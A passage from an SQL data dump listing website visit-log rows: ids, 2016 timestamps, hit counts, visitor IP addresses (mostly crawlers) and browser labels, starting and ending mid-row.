72.65.6','other'),(71530,1477785514,1,1,0,0,'164.132.161.64','other'),(71531,1477789642,9,9,0,0,'130.193.50.34','other'),(71532,1477789736,1,1,0,0,'164.132.161.33','other'),(71533,1477790320,5,5,0,0,'141.8.183.25','other'),(71534,1477790353,1,1,0,0,'51.255.65.14','other'),(71535,1477790771,1,1,0,0,'164.132.161.32','other'),(71536,1477791621,1,1,0,0,'157.55.39.35','other'),(71537,1477792265,1,1,0,0,'163.172.64.233','other'),(71538,1477792569,1,1,0,0,'51.255.65.89','other'),(71539,1477792712,1,1,0,0,'51.255.65.5','other'),(71540,1477793621,1,1,0,0,'164.132.161.3','other'),(71541,1477794535,1,1,0,0,'51.255.65.80','other'),(71542,1477794548,12,12,0,0,'69.30.213.138','other'),(71543,1477794619,1,1,0,0,'180.76.15.20','other'),(71544,1477794912,1,1,0,0,'180.76.15.144','other'),(71545,1477794991,1,1,0,0,'157.55.39.35','other'),(71546,1477795357,1,1,0,0,'51.255.65.45','other'),(71547,1477795468,2,2,0,0,'130.193.50.34','other'),(71548,1477795840,1,1,0,0,'163.172.65.203','other'),(71549,1477796275,1,1,0,0,'164.132.161.96','other'),(71550,1477796578,1,1,0,0,'51.255.65.9','other'),(71551,1477798253,1,1,0,0,'163.172.66.125','other'),(71552,1477798365,1,1,0,0,'163.172.66.81','other'),(71553,1477799135,1,1,0,0,'164.132.161.45','other'),(71554,1477799371,1,1,0,0,'163.172.66.14','other'),(71555,1477799639,1,0,1,0,'66.249.64.21',''),(71556,1477799952,1,1,0,0,'164.132.161.78','other'),(71557,1477800354,1,1,0,0,'163.172.64.237','other'),(71558,1477801026,1,1,0,0,'51.255.65.92','other'),(71559,1477801928,1,1,0,0,'163.172.66.131','other'),(71560,1477802761,1,1,0,0,'163.172.66.146','other'),(71561,1477803175,1,1,0,0,'51.255.65.42','other'),(71562,1477803498,1,1,0,0,'128.72.226.159','msie'),(71563,1477803610,1,1,0,0,'178.154.149.10','other'),(71564,1477803714,1,1,0,0,'164.132.161.84','other'),(71565,1477803980,1,1,0,0,'164.132.161.38','other'),(71566,1477804087,1,1,0,0,'163.172.66.73','other'),(71567,1477804090,1,1,0,0,'51.255.65.49','other'),(71568,1477804327,1,1,0,0,'163.172.66.172','other'),(71569,1477804521,1,1,0,0,'163.172.64.177','other'),(71570,1477804547,1,1,0,0,'51.255.65.23','other'),(71571,1477804592,1,1,0,0,'5.255.253.30','other'),(71572,1477804766,1,1,0,0,'164.132.161.4','other'),(71573,1477804810,1,1,0,0,'51.255.65.68','other'),(71574,1477804860,1,1,0,0,'164.132.161.3','other'),(71575,1477806022,1,1,0,0,'178.154.189.37','other'),(71576,1477806026,1,1,0,0,'141.8.142.10','other'),(71577,1477807816,1,1,0,0,'141.8.142.62','other'),(71578,1477807910,1,1,0,0,'51.255.65.89','other'),(71579,1477807927,1,1,0,0,'163.172.65.246','other'),(71580,1477808919,1,1,0,0,'163.172.65.34','other'),(71581,1477809048,1,1,0,0,'164.132.161.7','other'),(71582,1477809133,1,1,0,0,'141.8.132.41','other'),(71583,1477809262,1,1,0,0,'163.172.66.12','other'),(71584,1477810240,1,1,0,0,'163.172.65.119','other'),(71585,1477810251,1,0,1,0,'68.180.230.220',''),(71586,1477810331,1,1,0,0,'163.172.65.44','other'),(71587,1477810556,1,1,0,0,'163.172.65.19','other'),(71588,1477810638,1,1,0,0,'163.172.66.98','other'),(71589,1477810916,1,1,0,0,'94.179.209.79','firefox'),(71590,1477811184,1,1,0,0,'141.8.142.61','other'),(71591,1477811354,1,1,0,0,'5.255.253.55','other'),(71592,1477811622,1,1,0,0,'164.132.161.7','other'),(71593,1477811666,1,1,0,0,'51.255.65.61','other'),(71594,1477811845,1,1,0,0,'163.172.64.236','other'),(71595,1477811903,1,1,0,0,'66.102.9.27','other'),(71596,1477811948,1,1,0,0,'51.255.65.54','other'),(71597,1477812045,1,1,0,0,'164.132.161.39','other'),(71598,1477812086,1,1,0,0,'163.172.66.59','other'),(71599,1477812185,1,1,0,0,'66.249.93.14','chrome'),(71600,1477812353,1,1,0,0,'51.255.65.93','other'),(71601,1477813370,1,1,0,0,'163.172.66.84','other'),(71602,1477813502,1,1,0,0,'51.255.65.51','other'),(71603,1477813568,1,1,0,0,'163.172.65.13','other'),(71604,1477813752,1,1,0,0,'51.255.65.43','other'),(71605,1477814630,1,1,0,0,'164.132.161.85','other'),(71606,1477815070,1,1,0,0,'51.255.65.54','other'),(71607,1477815166,1,1,0,0,'66.102.9.29','other'),(71608,1477815243,1,1,0,0,'157.55.39.27','other'),(71609,1477815347,1,1,0,0,'163.172.65.23','other'),(71610,1477815360,1,1,0,0,'51.255.65.73','other'),(71611,1477815553,1,1,0,0,'51.255.65.84','other'),(71612,1477815654,1,1,0,0,'164.132.161.73','other'),(71613,1477816119,1,1,0,0,'141.8.142.85','other'),(71614,1477816156,1,1,0,0,'163.172.65.198','other'),(71615,1477816196,1,1,0,0,'178.154.189.31','other'),(71616,1477816199,1,1,0,0,'141.8.142.67','other'),(71617,1477817159,1,1,0,0,'51.255.65.32','other'),(71618,1477817239,1,1,0,0,'163.172.65.248','other'),(71619,1477817444,1,1,0,0,'51.255.65.51','other'),(71620,1477817580,1,1,0,0,'163.172.66.38','other'),(71621,1477818049,1,0,1,0,'66.249.64.27',''),(71622,1477818806,1,1,0,0,'163.172.65.7','other'),(71623,1477819101,1,1,0,0,'51.255.65.39','other'),(71624,1477819338,1,1,0,0,'5.255.253.10','other'),(71625,1477819553,1,1,0,0,'164.132.161.29','other'),(71626,1477819584,1,1,0,0,'51.255.65.96','other'),(71627,1477820944,1,1,0,0,'163.172.65.14','other'),(71628,1477821028,2,2,0,0,'130.193.50.34','other'),(71629,1477821679,1,1,0,0,'164.132.161.64','other'),(71630,1477821794,24,24,0,0,'69.30.234.2','other'),(71631,1477822551,1,1,0,0,'51.255.65.38','other'),(71632,1477823063,1,1,0,0,'91.196.178.38','firefox'),(71633,1477823175,1,1,0,0,'51.255.65.25','other'),(71634,1477823202,2,2,0,0,'130.193.50.34','other'),(71635,1477824271,1,1,0,0,'164.132.161.55','other'),(71636,1477824548,1,1,0,0,'164.132.161.5','other'),(71637,1477824954,1,1,0,0,'91.196.178.38','firefox'),(71638,1477825170,1,1,0,0,'51.255.65.97','other'),(71639,1477825268,1,0,1,0,'66.249.64.24',''),(71640,1477825378,1,1,0,0,'164.132.161.28','other'),(71641,1477825498,1,1,0,0,'51.255.65.30','other'),(71642,1477825846,1,1,0,0,'66.102.9.27','other'),(71643,1477826020,1,1,0,0,'163.172.66.61','other'),(71644,1477826334,1,1,0,0,'163.172.66.147','other'),(71645,1477826442,1,1,0,0,'163.172.66.67','other'),(71646,1477826573,2,2,0,0,'141.8.183.25','other'),(71647,1477826914,1,1,0,0,'163.172.64.192','other'),(71648,1477826963,1,1,0,0,'163.172.65.69','other'),(71649,1477826984,1,1,0,0,'164.132.161.53','other'),(71650,1477827304,1,1,0,0,'163.172.66.167','other'),(71651,1477827444,1,1,0,0,'164.132.161.91','other'),(71652,1477827904,1,1,0,0,'91.196.178.97','chrome'),(71653,1477827923,1,1,0,0,'130.193.50.34','other'),(71654,1477829089,1,1,0,0,'164.132.161.7','other'),(71655,1477829400,1,1,0,0,'66.102.9.29','other'),(71656,1477830897,1,1,0,0,'130.193.50.34','other'),(71657,1477830941,1,1,0,0,'163.172.64.249','other'),(71658,1477831374,1,0,1,0,'66.249.64.79',''),(71659,1477831909,1,1,0,0,'164.132.161.92','other'),(71660,1477832257,1,1,0,0,'163.172.66.169','other'),(71661,1477832377,1,1,0,0,'130.193.50.34','other'),(71662,1477832465,1,1,0,0,'130.193.51.19','other'),(71663,1477832690,1,1,0,0,'51.255.65.66','other'),(71664,1477833046,1,1,0,0,'66.102.9.27','other'),(71665,1477833804,1,1,0,0,'157.55.39.35','other'),(71666,1477834782,1,1,0,0,'163.172.65.227','other'),(71667,1477835323,1,1,0,0,'163.172.65.129','other'),(71668,1477835641,1,1,0,0,'164.132.161.51','other'),(71669,1477836144,1,1,0,0,'163.172.65.193','other'),(71670,1477836254,1,1,0,0,'37.110.48.22','firefox'),(71671,1477836364,1,1,0,0,'164.132.161.7','other'),(71672,1477836950,1,1,0,0,'163.172.66.88','other'),(71673,1477837535,1,1,0,0,'51.255.65.13','other'),(71674,1477837587,2,2,0,0,'130.193.50.34','other'),(71675,1477838665,1,1,0,0,'51.255.65.86','other'),(71676,1477840082,1,1,0,0,'51.255.65.7','other'),(71677,1477840645,1,1,0,0,'66.102.9.27','other'),(71678,1477840950,1,1,0,0,'93.158.152.9','other'),(71679,1477841040,1,1,0,0,'40.77.167.77','other'),(71680,1477841829,1,1,0,0,'163.172.65.189','other'),(71681,1477841901,1,1,0,0,'164.132.161.78','other'),(71682,1477842049,1,1,0,0,'40.77.167.76','other'),(71683,1477842112,1,1,0,0,'204.79.180.75','msie'),(71684,1477842466,1,1,0,0,'128.68.129.55','chrome'),(71685,1477842626,1,1,0,0,'164.132.161.49','other'),(71686,1477843348,1,1,0,0,'164.132.161.26','other'),(71687,1477843553,1,1,0,0,'164.132.161.84','other'),(71688,1477843797,1,1,0,0,'51.255.65.17','other'),(71689,1477843808,1,1,0,0,'66.102.9.29','other'),(71690,1477844028,1,1,0,0,'164.132.161.81','other'),(71691,1477844047,1,1,0,0,'163.172.66.54','other'),(71692,1477844136,1,1,0,0,'163.172.65.234','other'),(71693,1477844273,1,1,0,0,'51.255.65.5','other'),(71694,1477844462,1,1,0,0,'51.255.65.53','other'),(71695,1477844655,1,1,0,0,'94.179.209.79','firefox'),(71696,1477844662,1,1,0,0,'163.172.65.210','other'),(71697,1477844900,1,1,0,0,'51.255.65.81','other'),(71698,1477845295,1,1,0,0,'164.132.161.29','other'),(71699,1477845413,1,1,0,0,'163.172.66.63','other'),(71700,1477845512,1,1,0,0,'51.255.65.41','other'),(71701,1477847514,1,1,0,0,'157.55.39.35','other'),(71702,1477849618,1,1,0,0,'157.55.39.35','other'),(71703,1477849715,1,1,0,0,'128.69.216.61','chrome'),(71704,1477850995,1,1,0,0,'176.98.82.236','opera'),(71705,1477851113,1,1,0,0,'163.172.66.115','other'),(71706,1477851150,1,1,0,0,'66.102.9.29','other'),(71707,1477851255,1,1,0,0,'94.179.124.170','chrome'),(71708,1477851384,1,1,0,0,'163.172.65.209','other'),(71709,1477851649,1,1,0,0,'91.196.178.164','firefox'),(71710,1477852517,1,1,0,0,'163.172.65.189','other'),(71711,1477853092,1,1,0,0,'164.132.161.74','other'),(71712,1477853266,1,1,0,0,'94.179.209.79','firefox'),(71713,1477853984,1,0,1,0,'66.249.64.21',''),(71714,1477854156,1,1,0,0,'164.132.161.80','other'),(71715,1477854157,2,2,0,0,'163.172.66.30','other'),(71716,1477854243,1,1,0,0,'163.172.65.184','other'),(71717,1477854813,1,1,0,0,'164.132.161.66','other'),(71718,1477854887,1,1,0,0,'94.179.124.170','chrome'),(71719,1477854993,1,1,0,0,'163.172.66.165','other'),(71720,1477855071,1,1,0,0,'180.76.15.141','other'),(71721,1477855127,1,1,0,0,'40.77.167.77','other'),(71722,1477855506,1,1,0,0,'51.255.65.21','other'),(71723,1477855644,1,1,0,0,'40.77.167.76','other'),(71724,1477855918,1,1,0,0,'163.172.64.244','other'),(71725,1477856156,1,1,0,0,'51.255.65.48','other'),(71726,1477856202,1,1,0,0,'51.255.65.67','other'),(71727,1477856569,1,1,0,0,'163.172.64.225','other'),(71728,1477857093,1,1,0,0,'51.255.65.90','other'),(71729,1477857147,1,1,0,0,'40.77.167.77','other'),(71730,1477857284,1,1,0,0,'163.172.65.34','other'),(71731,1477857390,1,1,0,0,'163.172.64.234','other'),(71732,1477857672,1,1,0,0,'163.172.65.186','other'),(71733,1477857856,1,1,0,0,'91.229.120.2','chrome'),(71734,1477858800,1,1,0,0,'164.132.161.20','other'),(71735,1477858944,1,1,0,0,'66.102.9.25','other'),(71736,1477859806,1,1,0,0,'164.132.161.22','other'),(71737,1477860263,1,1,0,0,'46.188.23.40','msie'),(71738,1477860867,1,1,0,0,'51.255.65.2','other'),(71739,1477861834,1,1,0,0,'163.172.65.15','other'),(71740,1477861897,1,1,0,0,'66.102.9.29','other'),(71741,1477862376,1,1,0,0,'93.158.152.26','other'),(71742,1477862568,1,1,0,0,'163.172.65.204','other'),(71743,1477862669,1,1,0,0,'141.8.142.62','other'),(71744,1477863727,1,1,0,0,'163.172.66.77','other'),(71745,1477864728,1,1,0,0,'163.172.65.35','other'),(71746,1477865009,1,1,0,0,'164.132.161.97','other'),(71747,1477865031,30,30,0,0,'5.9.155.119','other'),(71748,1477865129,1,1,0,0,'51.255.65.66','other'),(71749,1477865397,1,1,0,0,'51.255.65.43','other'),(71750,1477865713,1,1,0,0,'66.102.9.25','other'),(71751,1477865788,1,1,0,0,'51.255.65.14','other'),(71752,1477865933,1,1,0,0,'164.132.161.55','other'),(71753,1477866119,1,1,0,0,'130.193.50.34','other'),(71754,1477868517,1,1,0,0,'51.255.65.53','other'),(71755,1477868906,1,1,0,0,'163.172.65.122','other'),(71756,1477869074,1,1,0,0,'66.102.9.25','other'),(71757,1477869131,1,0,1,0,'66.249.64.21',''),(71758,1477869898,1,1,0,0,'164.132.161.6','other'),(71759,1477870106,1,1,0,0,'40.77.167.59','other'),(71760,1477870257,1,1,0,0,'51.255.65.95','other'),(71761,1477870288,1,1,0,0,'163.172.64.216','other'),(71762,1477870523,1,1,0,0,'51.255.65.65','other'),(71763,1477870926,1,1,0,0,'163.172.65.251','other'),(71764,1477870969,1,1,0,0,'51.255.65.76','other'),(71765,1477870993,1,0,1,0,'66.249.64.74',''),(71766,1477871278,1,1,0,0,'164.132.161.71','other'),(71767,1477871364,1,1,0,0,'163.172.66.167','other'),(71768,1477871436,1,1,0,0,'164.132.161.25','other'),(71769,1477871937,1,1,0,0,'51.255.65.95','other'),(71770,1477872003,1,1,0,0,'51.255.65.53','other'),(71771,1477872645,1,1,0,0,'164.132.161.36','other'),(71772,1477872823,1,1,0,0,'66.102.9.29','other'),(71773,1477872870,1,1,0,0,'164.132.161.51','other'),(71774,1477873721,1,1,0,0,'163.172.66.11','other'),(71775,1477873828,19,19,0,0,'5.9.111.70','other'),(71776,1477873852,1,1,0,0,'164.132.161.52','other'),(71777,1477874303,1,1,0,0,'163.172.66.174','other'),(71778,1477874926,1,1,0,0,'163.172.66.88','other'),(71779,1477875230,1,1,0,0,'163.172.66.91','other'),(71780,1477875326,1,1,0,0,'163.172.66.87','other'),(71781,1477875545,1,1,0,0,'163.172.65.49','other'),(71782,1477875570,1,0,1,0,'66.249.64.27',''),(71783,1477876014,1,1,0,0,'163.172.66.150','other'),(71784,1477876069,1,1,0,0,'51.255.65.61','other'),(71785,1477876328,1,1,0,0,'51.255.65.81','other'),(71786,1477876550,1,1,0,0,'66.102.9.27','other'),(71787,1477876840,1,0,1,0,'66.249.64.27',''),(71788,1477876899,1,1,0,0,'163.172.66.21','other'),(71789,1477876914,1,1,0,0,'51.255.65.78','other'),(71790,1477877094,1,1,0,0,'164.132.161.55','other'),(71791,1477877987,1,1,0,0,'51.255.65.92','other'),(71792,1477878092,1,1,0,0,'164.132.161.37','other'),(71793,1477878192,1,1,0,0,'51.255.65.44','other'),(71794,1477878277,1,1,0,0,'217.69.133.227','other'),(71795,1477878857,1,1,0,0,'163.172.66.58','other'),(71796,1477878894,1,1,0,0,'164.132.161.59','other'),(71797,1477879254,1,1,0,0,'164.132.161.5','other'),(71798,1477879812,1,1,0,0,'163.172.66.110','other'),(71799,1477880294,1,1,0,0,'163.172.64.199','other'),(71800,1477880753,1,1,0,0,'163.172.65.131','other'),(71801,1477880870,1,1,0,0,'163.172.65.222','other'),(71802,1477881941,1,1,0,0,'164.132.161.45','other'),(71803,1477881977,1,1,0,0,'51.255.65.73','other'),(71804,1477882623,1,1,0,0,'130.193.50.34','other'),(71805,1477882633,1,1,0,0,'66.102.9.25','other'),(71806,1477883577,1,1,0,0,'163.172.64.242','other'),(71807,1477884130,1,1,0,0,'163.172.66.89','other'),(71808,1477884141,1,1,0,0,'163.172.64.231','other'),(71809,1477884706,1,1,0,0,'40.77.167.77','other'),(71810,1477884740,1,1,0,0,'163.172.66.149','other'),(71811,1477884830,1,1,0,0,'163.172.66.52','other'),(71812,1477885022,1,1,0,0,'163.172.66.113','other'),(71813,1477885797,1,1,0,0,'40.77.167.77','other'),(71814,1477885928,1,1,0,0,'164.132.161.47','other'),(71815,1477886466,1,1,0,0,'164.132.161.30','other'),(71816,1477886657,1,1,0,0,'51.255.65.75','other'),(71817,1477886738,1,1,0,0,'130.193.50.34','other'),(71818,1477887213,1,1,0,0,'163.172.66.160','other'),(71819,1477887410,1,1,0,0,'40.77.167.76','other'),(71820,1477887416,1,1,0,0,'164.132.161.32','other'),(71821,1477887707,1,1,0,0,'163.172.65.15','other'),(71822,1477887938,1,1,0,0,'51.255.65.33','other'),(71823,1477887981,1,1,0,0,'164.132.161.96','other'),(71824,1477888016,1,1,0,0,'51.255.65.21','other'),(71825,1477888101,1,1,0,0,'163.172.64.246','other'),(71826,1477888185,1,1,0,0,'51.255.65.66','other'),(71827,1477888792,1,1,0,0,'164.132.161.43','other'),(71828,1477890783,1,1,0,0,'164.132.161.7','other'),(71829,1477890963,1,1,0,0,'163.172.66.176','other'),(71830,1477891042,1,1,0,0,'40.77.167.77','other'),(71831,1477891433,1,1,0,0,'163.172.65.34','other'),(71832,1477891646,1,1,0,0,'163.172.65.131','other'),(71833,1477891659,1,1,0,0,'66.102.9.29','other'),(71834,1477892087,1,1,0,0,'164.132.161.51','other'),(71835,1477893018,1,1,0,0,'164.132.161.28','other'),(71836,1477893334,1,1,0,0,'51.255.65.11','other'),(71837,1477893390,1,1,0,0,'51.255.65.8','other'),(71838,1477893860,1,1,0,0,'163.172.66.123','other'),(71839,1477894133,1,1,0,0,'66.102.9.29','other'),(71840,1477894195,1,1,0,0,'163.172.66.22','other'),(71841,1477894514,1,1,0,0,'164.132.161.32','other'),(71842,1477894550,1,1,0,0,'163.172.65.250','other'),(71843,1477895373,1,1,0,0,'207.46.13.169','other'),(71844,1477895557,1,1,0,0,'163.172.65.210','other'),(71845,1477896008,1,1,0,0,'66.102.9.27','chrome'),(71846,1477896107,1,1,0,0,'51.255.65.80','other'),(71847,1477896535,1,1,0,0,'207.46.13.85','other'),(71848,1477896754,1,1,0,0,'51.255.65.6','other'),(71849,1477896934,1,1,0,0,'163.172.66.12','other'),(71850,1477897451,1,1,0,0,'163.172.65.188','other'),(71851,1477897535,1,1,0,0,'164.132.161.38','other'),(71852,1477897866,1,1,0,0,'164.132.161.84','other'),(71853,1477897918,1,1,0,0,'66.102.9.25','other'),(71854,1477898604,1,1,0,0,'163.172.66.50','other'),(71855,1477899052,1,1,0,0,'91.196.178.66','firefox'),(71856,1477899330,1,1,0,0,'163.172.66.149','other'),(71857,1477899381,1,1,0,0,'163.172.66.167','other'),(71858,1477899615,1,1,0,0,'163.172.66.27','other'),(71859,1477899630,1,1,0,0,'164.132.161.73','other'),(71860,1477899718,1,1,0,0,'91.196.178.68','chrome'),(71861,1477899867,1,1,0,0,'91.196.178.67','firefox'),(71862,1477899965,1,1,0,0,'164.132.161.6','other'),(71863,1477900226,1,1,0,0,'163.172.66.111','other'),(71864,1477900304,1,1,0,0,'163.172.64.178','other'),(71865,1477900523,1,1,0,0,'163.172.66.163','other'),(71866,1477900605,1,1,0,0,'164.132.161.75','other'),(71867,1477900809,1,1,0,0,'40.77.167.77','other'),(71868,1477901301,1,1,0,0,'91.196.178.67','firefox'),(71869,1477901794,1,1,0,0,'66.102.9.25','other'),(71870,1477902275,1,1,0,0,'91.196.178.65','chrome'),(71871,1477902348,1,1,0,0,'163.172.66.184','other'),(71872,1477902608,1,1,0,0,'51.255.65.50','other'),(71873,1477903333,1,1,0,0,'51.255.65.61','other'),(71874,1477903500,1,1,0,0,'163.172.65.201','other'),(71875,1477903611,1,1,0,0,'164.132.161.73','other'),(71876,1477903798,1,1,0,0,'163.172.64.182','other'),(71877,1477903810,1,1,0,0,'164.132.161.38','other'),(71878,1477904020,1,1,0,0,'91.196.178.68','firefox'),(71879,1477904478,1,1,0,0,'91.196.178.71','chrome'),(71880,1477904582,1,1,0,0,'176.38.47.48','firefox'),(71881,1477905660,1,1,0,0,'163.172.66.158','other'),(71882,1477905759,1,1,0,0,'66.102.9.29','other'),(71883,1477905857,1,1,0,0,'82.193.113.218','chrome'),(71884,1477906000,1,1,0,0,'91.196.177.46','other'),(71885,1477906240,1,1,0,0,'163.172.65.227','other'),(71886,1477906816,1,1,0,0,'51.255.65.27','other'),(71887,1477907042,1,1,0,0,'164.132.161.85','other'),(71888,1477907076,1,1,0,0,'164.132.161.90','other'),(71889,1477908557,2,2,0,0,'141.8.183.25','other'),(71890,1477908752,1,1,0,0,'163.172.66.39','other'),(71891,1477908759,1,1,0,0,'91.196.178.68','firefox'),(71892,1477909315,1,1,0,0,'163.172.66.119','other'),(71893,1477909386,1,1,0,0,'95.132.3.194','firefox'),(71894,1477909651,1,1,0,0,'130.193.50.34','other'),(71895,1477909725,1,1,0,0,'66.102.9.29','other'),(71896,1477910503,1,1,0,0,'164.132.161.44','other'),(71897,1477910516,1,1,0,0,'51.255.65.36','other'),(71898,1477910674,1,1,0,0,'164.132.161.6','other'),(71899,1477910792,1,1,0,0,'164.132.161.16','other'),(71900,1477911386,1,1,0,0,'91.196.178.134','firefox'),(71901,1477911768,1,1,0,0,'51.255.65.37','other'),(71902,1477912558,1,1,0,0,'94.179.8.74','chrome'),(71903,1477912559,1,1,0,0,'91.196.178.68','chrome'),(71904,1477912785,1,1,0,0,'66.102.9.25','other'),(71905,1477912958,1,1,0,0,'163.172.65.34','other'),(71906,1477913194,1,1,0,0,'51.255.65.87','other'),(71907,1477913367,1,0,1,0,'66.249.64.27',''),(71908,1477913753,1,1,0,0,'51.255.65.49','other'),(71909,1477913990,1,1,0,0,'51.255.65.85','other'),(71910,1477914297,1,1,0,0,'91.196.178.72','chrome'),(71911,1477914374,1,1,0,0,'163.172.64.237','other'),(71912,1477914509,1,1,0,0,'91.196.178.65','firefox'),(71913,1477914682,1,1,0,0,'163.172.64.179','other'),(71914,1477914951,1,1,0,0,'163.172.66.162','other'),(71915,1477915011,1,1,0,0,'91.109.19.24','chrome'),(71916,1477915355,1,1,0,0,'163.172.66.54','other'),(71917,1477915697,1,0,1,0,'66.249.64.21',''),(71918,1477915972,1,1,0,0,'66.102.9.27','other'),(71919,1477916278,1,1,0,0,'163.172.66.11','other'),(71920,1477916288,1,1,0,0,'40.77.167.76','other'),(71921,1477916501,1,1,0,0,'164.132.161.53','other'),(71922,1477916828,1,1,0,0,'51.255.65.95','other'),(71923,1477917307,1,0,1,0,'66.249.64.69',''),(71924,1477918145,1,1,0,0,'180.76.15.143','other'),(71925,1477918310,1,1,0,0,'91.196.178.72','firefox'),(71926,1477918456,1,1,0,0,'207.46.13.85','other'),(71927,1477918473,1,1,0,0,'51.255.65.37','other'),(71928,1477918575,1,1,0,0,'164.132.161.49','other'),(71929,1477918806,1,0,1,0,'66.249.64.24',''),(71930,1477919070,1,1,0,0,'163.172.65.251','other'),(71931,1477919316,1,1,0,0,'51.255.65.64','other'),(71932,1477919388,1,1,0,0,'163.172.65.245','other'),(71933,1477919479,1,1,0,0,'91.124.224.36','chrome'),(71934,1477919498,1,0,1,0,'66.249.64.27',''),(71935,1477919526,1,1,0,0,'91.196.178.72','firefox'),(71936,1477919666,1,1,0,0,'164.132.161.87','other'),(71937,1477919735,1,1,0,0,'164.132.161.33','other'),(71938,1477919798,1,1,0,0,'66.102.9.27','other'),(71939,1477919843,1,1,0,0,'163.172.64.223','other'),(71940,1477919998,1,1,0,0,'37.53.226.195','firefox'),(71941,1477920166,1,1,0,0,'77.222.140.6','other'),(71942,1477920505,1,1,0,0,'163.172.66.135','other'),(71943,1477920669,1,1,0,0,'66.249.64.27','chrome'),(71944,1477920912,1,1,0,0,'130.193.50.34','other'),(71945,1477921130,1,0,1,0,'66.249.64.21',''),(71946,1477921518,1,0,1,0,'66.249.64.79',''),(71947,1477921532,1,1,0,0,'164.132.161.70','other'),(71948,1477922276,1,0,1,0,'66.249.64.24',''),(71949,1477922365,1,1,0,0,'66.249.64.74','chrome'),(71950,1477922366,1,1,0,0,'91.196.177.46','chrome'),(71951,1477922409,1,1,0,0,'51.255.65.21','other'),(71952,1477922447,1,1,0,0,'164.132.161.60','other'),(71953,1477922460,1,1,0,0,'91.196.178.71','chrome'),(71954,1477922619,1,1,0,0,'130.193.50.34','other'),(71955,1477922633,1,1,0,0,'163.172.65.229','other'),(71956,1477923047,1,1,0,0,'164.132.161.50','other'),(71957,1477923160,1,1,0,0,'37.53.71.66','firefox'),(71958,1477923173,1,1,0,0,'141.8.183.25','other'),(71959,1477923304,2,2,0,0,'91.196.178.68','firefox'),(71960,1477923367,1,1,0,0,'91.196.178.71','chrome'),(71961,1477923375,1,1,0,0,'66.102.9.29','other'),(71962,1477923381,1,1,0,0,'91.196.177.46','chrome'),(71963,1477923417,1,1,0,0,'163.172.66.144','other'),(71964,1477923483,1,0,1,0,'66.249.64.27',''),(71965,1477923515,1,0,1,0,'66.249.64.21',''),(71966,1477923598,1,0,1,0,'66.249.64.24',''),(71967,1477923730,1,1,0,0,'51.255.65.10','other'),(71968,1477924051,1,1,0,0,'163.172.65.122','other'),(71969,1477924831,1,1,0,0,'91.196.178.68','firefox'),(71970,1477924952,1,1,0,0,'91.196.177.46','msie'),(71971,1477924955,2,2,0,0,'91.196.177.46','other'),(71972,1477924971,2,0,2,0,'66.249.64.24',''),(71973,1477925022,1,1,0,0,'91.196.177.46','chrome'),(71974,1477925074,1,1,0,0,'164.132.161.95','other'),(71975,1477925317,1,1,0,0,'91.196.178.65','firefox'),(71976,1477925348,1,1,0,0,'164.132.161.80','other'),(71977,1477925526,1,1,0,0,'51.255.65.31','other'),(71978,1477925766,1,0,1,0,'66.249.64.27',''),(71979,1477925808,1,1,0,0,'163.172.66.112','other'),(71980,1477926049,1,1,0,0,'163.172.65.207','other'),(71981,1477926145,1,0,1,0,'66.249.64.79',''),(71982,1477927008,1,1,0,0,'178.92.39.175','chrome'),(71983,1477927283,1,1,0,0,'51.255.65.12','other'),(71984,1477927727,1,1,0,0,'163.172.65.2','other'),(71985,1477928579,1,1,0,0,'66.102.9.29','other'),(71986,1477928636,1,0,1,0,'66.249.64.24',''),(71987,1477928648,1,1,0,0,'51.255.65.9','other'),(71988,1477928808,1,1,0,0,'163.172.66.49','other'),(71989,1477928877,1,1,0,0,'163.172.65.127','other'),(71990,1477929230,1,1,0,0,'164.132.161.81','other'),(71991,1477929436,1,1,0,0,'164.132.161.31','other'),(71992,1477929550,1,1,0,0,'164.132.161.5','other'),(71993,1477929896,1,1,0,0,'192.187.104.235','other'),(71994,1477929916,1,1,0,0,'163.172.66.180','other'),(71995,1477930284,1,1,0,0,'164.132.161.53','other'),(71996,1477930308,1,1,0,0,'164.132.161.90','other'),(71997,1477930359,1,1,0,0,'163.172.66.120','other'),(71998,1477930431,1,1,0,0,'66.102.9.29','other'),(71999,1477930860,1,1,0,0,'163.172.65.109','other'),(72000,1477931049,1,1,0,0,'51.255.65.3','other'),(72001,1477931279,1,0,1,0,'66.249.64.21',''),(72002,1477931616,2,0,2,0,'66.249.64.27',''),(72003,1477931619,1,1,0,0,'94.179.209.79','firefox'),(72004,1477931923,1,1,0,0,'40.77.167.76','other'),(72005,1477932265,1,1,0,0,'95.133.152.8','firefox'),(72006,1477932270,1,1,0,0,'51.255.65.64','other'),(72007,1477932378,2,0,2,0,'66.249.64.24',''),(72008,1477932384,1,1,0,0,'164.132.161.91','other'),(72009,1477933301,2,0,2,0,'66.249.64.21',''),(72010,1477933507,1,1,0,0,'164.132.161.81','other'),(72011,1477933684,1,1,0,0,'51.255.65.17','other'),(72012,1477933699,1,1,0,0,'91.196.178.38','firefox'),(72013,1477933880,1,1,0,0,'51.255.65.52','other'),(72014,1477934255,1,1,0,0,'66.102.9.61','other'),(72015,1477934348,1,1,0,0,'130.180.216.247','other'),(72016,1477934371,1,1,0,0,'130.193.51.19','other'),(72017,1477934386,2,0,2,0,'66.249.64.21',''),(72018,1477934416,2,0,2,0,'66.249.64.24',''),(72019,1477934483,1,1,0,0,'163.172.65.225','other'),(72020,1477934704,1,0,1,0,'66.249.64.27',''),(72021,1477934765,1,1,0,0,'163.172.66.139','other'),(72022,1477934965,1,1,0,0,'164.132.161.40','other'),(72023,1477934979,1,1,0,0,'163.172.64.245','other'),(72024,1477935542,1,1,0,0,'163.172.65.194','other'),(72025,1477935582,1,1,0,0,'130.180.216.95','chrome'),(72026,1477935813,1,1,0,0,'163.172.66.61','other'),(72027,1477936846,1,1,0,0,'163.172.66.147','other'),(72028,1477937013,1,1,0,0,'141.8.183.25','other'),(72029,1477938254,1,1,0,0,'66.102.9.57','other'),(72030,1477938306,1,1,0,0,'141.8.183.25','other'),(72031,1477938376,1,1,0,0,'91.196.178.65','firefox'),(72032,1477938564,1,1,0,0,'51.255.65.33','other'),(72033,1477938703,2,2,0,0,'92.112.150.89','other'),(72034,1477938814,1,1,0,0,'163.172.66.133','other'),(72035,1477939161,1,1,0,0,'91.196.178.164','firefox'),(72036,1477939731,1,1,0,0,'163.172.66.151','other'),(72037,1477939932,1,1,0,0,'91.196.178.103','chrome'),(72038,1477940006,2,0,2,0,'66.249.64.27',''),(72039,1477940775,1,1,0,0,'213.109.238.75','chrome'),(72040,1477940914,1,0,1,0,'66.249.64.79',''),(72041,1477941208,1,1,0,0,'164.132.161.68','other'),(72042,1477941439,2,0,2,0,'66.249.64.27',''),(72043,1477941660,3,0,3,0,'66.249.64.21',''),(72044,